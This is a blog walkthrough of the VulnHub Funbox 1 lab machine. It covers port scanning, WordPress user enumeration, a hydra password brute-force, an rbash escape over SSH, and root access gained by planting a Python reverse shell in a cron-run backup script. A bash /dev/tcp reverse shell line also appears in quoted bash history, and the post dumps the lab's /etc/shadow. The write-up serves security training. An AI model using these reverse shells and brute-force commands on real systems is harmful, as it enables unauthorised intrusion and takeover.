VulnHub Funbox 1 Walkthrough – Rbash Escape

Next up on my weekly stream was VulnHub Funbox 1.

VulnHub Funbox 1 Walkthrough – Introduction

My last VulnHub box was Photographer, which I solved the same night as this one.

While it can get a bit repetitive attacking vulnerable WordPress systems, this was the first box that I got to escape restricted bash.

You can find the VM here, and it was about an intermediate difficulty.

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Enumeration

First, I ran a ping sweep to see where the box was on my network.

[email protected]:~/funbox# nmap -sn 192.168.5.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 20:48 EDT

...

Nmap scan report for 192.168.5.133
Host is up (0.0035s latency).
MAC Address: 08:00:27:4E:6F:CA (Oracle VirtualBox virtual NIC)

Next, I ran a quick port scan, and discovered that ports 21, 22, and 80 were open on the target.

[email protected]:~/funbox# nmap -A 192.168.5.133
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 20:48 EDT
Nmap scan report for 192.168.5.133
Host is up (0.00092s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
MAC Address: 08:00:27:4E:6F:CA (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=39945%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F35DF84%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.92 ms 192.168.5.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.25 seconds

When I looked at the robots.txt file, I saw that a secret directory was mentioned.

VulnHub Funbox 1 - Robots

Unfortunately, the secret directory was just a false flag, and there wasn’t anything there.

Secrets directory

That said, when I visited the hostname on port 80, I found a basic looking WordPress installation.

WordPress installation

When I performed username enumeration, the first user was obviously ‘admin’.

VulnHub Funbox 1 - Admin user

Next, I discovered that user #2 was ‘joe miller’, as you can see by the title bar.

Joe Miller author

To verify this, I tested the WordPress admin login for a username enumeration vulnerability and confirmed that the ‘admin’ user existed.

Admin username enumeration

Finally, I also confirmed that the ‘joe’ username existed.

VulnHub Funbox 1 - Joe username enumeration

Initial Foothold

First, I used hydra to brute-force a password for the joe user.

[email protected]:~/funbox# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt funbox.fritz.box -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-08-13 21:10:44

...

[ATTEMPT] target funbox.fritz.box - login "joe" - pass "rockyou" - 14344407 of 0 [child 28688798] (0/13)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "12345678" - 14344408 of 0 [child 28688798] (0/15)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "abc123" - 14344409 of 0 [child 28688798] (0/2)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "nicole" - 14344410 of 0 [child 28688798] (0/3)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "daniel" - 14344411 of 0 [child 28688798] (0/9)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "babygirl" - 14344412 of 0 [child 28688798] (0/6)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "monkey" - 14344413 of 0 [child 28688798] (0/0)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "lovely" - 14344414 of 0 [child 28688798] (0/1)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "jessica" - 14344415 of 0 [child 28688798] (0/5)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "654321" - 14344416 of 0 [child 28688798] (0/7)
[80][http-post-form] host: funbox.fritz.box   login: joe   password: 12345
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-08-13 21:12:04

Using the joe // 12345 credential combination, I was able to successfully login to the WordPress administrative panel

Successful WordPress authentication

Unfortunately, the ‘joe’ user was not a WordPress admin, so I could not upload a malicious plugin.

That said, I tested the same credentials over SSH, and was able to successfully login!

[email protected]:~/funbox# ssh [email protected]
The authenticity of host '192.168.5.133 (192.168.5.133)' can't be established.
ECDSA key fingerprint is SHA256:8BF5XWcRdH2tQKCwjiIBCp3BoP1JLcUYr8gzicYKmEg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.5.133' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

...

You have mail.
Last login: Sat Jul 18 10:02:39 2020 from 192.168.178.143
[email protected]:~$

Next, I tried to execute some commands on the target, but was stuck in a restricted bash environment.

[email protected]:~$ cat .bash-rbash: /dev/null: restricted: cannot redirect output
bash_completion: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash_completion: _upvars: `-a0': invalid number specifier

cat: .ba: No such file or directory

After a quick Google search, I found a great blog post about escaping from rbash.

[email protected]:~/funbox# ssh [email protected] -t "bash --noprofile"
[email protected]'s password:
[email protected]:~$ cd /home/funny
[email protected]:/home/funny$

Inside of the ‘funny’ user’s home directory, I discovered a world readable file called ‘.reminder.sh’.

[email protected]:/home/funny$ ls -al
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
-rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh
-rw------- 1 funny funny     1462 Jul 18 10:07 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25 12:03 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25 12:03 .bashrc
drwx------ 2 funny funny     4096 Jun 19 10:43 .cache
-rw-rw-r-- 1 funny funny 48701440 Aug 14 01:16 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25 12:03 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19 14:13 .reminder.sh
-rw-rw-r-- 1 funny funny       74 Jun 19 12:25 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19 10:44 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18 10:02 .viminfo
[email protected]:/home/funny$ cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" [email protected]

When I took a look at the ‘.backup.sh’ file, it was a script that would back up the web directory to the html.tar file.

[email protected]:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
[email protected]:/home/funny$ ls -al /var/www/html
total 240
drwxrwxrwx  6 www-data www-data  4096 Jul 18 10:12 .
drwxr-xr-x  4 root     root      4096 Jun 19 11:18 ..
-rwxrwxrwx  1 www-data www-data 10918 Jun 19 11:16 default.htm

...

-rwxrwxrwx  1 www-data www-data  4755 Jul 17 16:02 wp-trackback.php
-rwxrwxrwx  1 www-data www-data  3133 Jul 17 16:02 xmlrpc.php
[email protected]:/home/funny$ ls -al /var/www/html/secret/
total 12
drwxrwxr-x 2 joe      joe      4096 Jul 18 10:05 .
drwxrwxrwx 6 www-data www-data 4096 Jul 18 10:12 ..
-rw-rw-r-- 1 joe      joe        30 Jul 18 10:05 index.html

I took a look at the html.tar file from the joe user but didn’t find anything interesting or useful for escalation.

[email protected]:/home/funny$ cp html.tar /home/joe
[email protected]:/home/funny$ cd /home/joe
[email protected]:~$ tar -xf html.tar

Privilege Escalation

First, I added a command to the backup script, to see if any other users were executing it. As you can see, the ‘funny’ user was executing this script.

[email protected]:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
touch /tmp/test12345
[email protected]:/home/funny$ ls -al /tmp/test*
-rw-rw-r-- 1 funny funny 0 Aug 14 01:24 /tmp/test12345

Next, I changed the script to include a Python reverse shell, to get access to the funny user.

[email protected]:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I caught the reverse shell, I had access to another user account.

[email protected]:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49860
/bin/sh: 0: can't access tty; job control turned off
$ id  
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

Unfortunately, I couldn’t find any way to escalate from funny to root.

When I looked at joe’s mailbox, I found that the root user was asking about the backup script as well as calling out some weak password usage.

[email protected]:~$ cat /home/joe/mbox
cat /home/joe/mbox
From [email protected]  Fri Jun 19 13:12:38 2020
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by funbox.fritz.box (Postfix, from userid 0)
    id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <[email protected]>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <[email protected]>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <[email protected]>

Hi Joe, please tell funny the backupscript is done.

From [email protected]  Fri Jun 19 13:15:21 2020
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by funbox.fritz.box (Postfix, from userid 0)
    id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <[email protected]>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <[email protected]>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <[email protected]>

Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.

When I looked at joe’s bash_history file, I thought that I found the root password.

$ cat .bash_history
cat .bash_history
sudo apt update && apt upgrade
su root
sudo su

...

ls -la
passwd root [email protected]
passwd root
passwd -root
sudo su
exit
crontab -e
su root
[email protected]
su root
clear

...

echo "bash -i >& /dev/tcp/192.168.178.143/1234 0>&1" >> /home/funny/.backup.sh
date
crontab -e
date
bash -i >& /dev/tcp/192.168.178.143/1234 0>&1"

...

clear
ls
exit

That said, I had the idea to try and catch my reverse shell again, as the root user could be executing it as well.

When I caught multiple copies of my reverse shell, one of them came back as root!

[email protected]:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49870
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ exit
[email protected]:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49872
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

When I viewed root’s crontab file, this made sense, as the root user was also executing the backup script every five minutes.

[email protected]:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49872
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task

...

*/5 * * * * /home/funny/.backup.sh

Finally, I grabbed the flag file, and finished the box!

# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

And, as usual, I grabbed the shadow file for potential cracking or research in the future.

# cat /etc/shadow
root:$6$ReRncrEVp8A0IQmk$ANOc.bX2eK8DZv2i/DQPqCWcdE8XV39IVjBBL6xlGSlCPFOPM.H2y7lyDHtJbb.nkH47Zo.sj3OhcxTOl7usR0:18461:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::

...

systemd-coredump:!!:18432::::::
funny:$6$Gh348TZlMEiH8fc.$rFB4/BVFrjkF1z6SbZklOKzVwxhsfY6q9S3jrWDO.2eiwcVDvqrBjL32KPRzW7KkQItvAz4X.T0hcmoO62jV7.:18461:0:99999:7:::
lxd:!:18432::::::
mysql:!:18432:0:99999:7:::
joe:$6$ptLbGWD34AIV6LXw$8zE3IrzaA0mRXeuu1ubjI2OLujCMOuEYInT2H3zGRShKyk2VyLKNI6X643BXyrAYxNYHmwbS9pUfljdJQ8kUS.:18432:0:99999:7:::
postfix:*:18432:0:99999:7:::
proftpd:!:18461:0:99999:7:::
ftp:*:18461:0:99999:7:::

VulnHub Funbox 1 Walkthrough – Conclusion

This wasn’t a super complicated box, but it was another good one to get back into the swing of things.

I would have liked a different escalation method for funny to root, but it was still a good example of scheduled task exploitation.

Let me know if these write-ups get repetitive posting them all back to back though!

To catch me live, be sure to follow me on Twitch.

1 thought on “VulnHub Funbox 1 Walkthrough – Rbash Escape”

  1. Pingback: VulnHub Sunset Decoy Walkthrough - Cracking with John | doyler.net

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.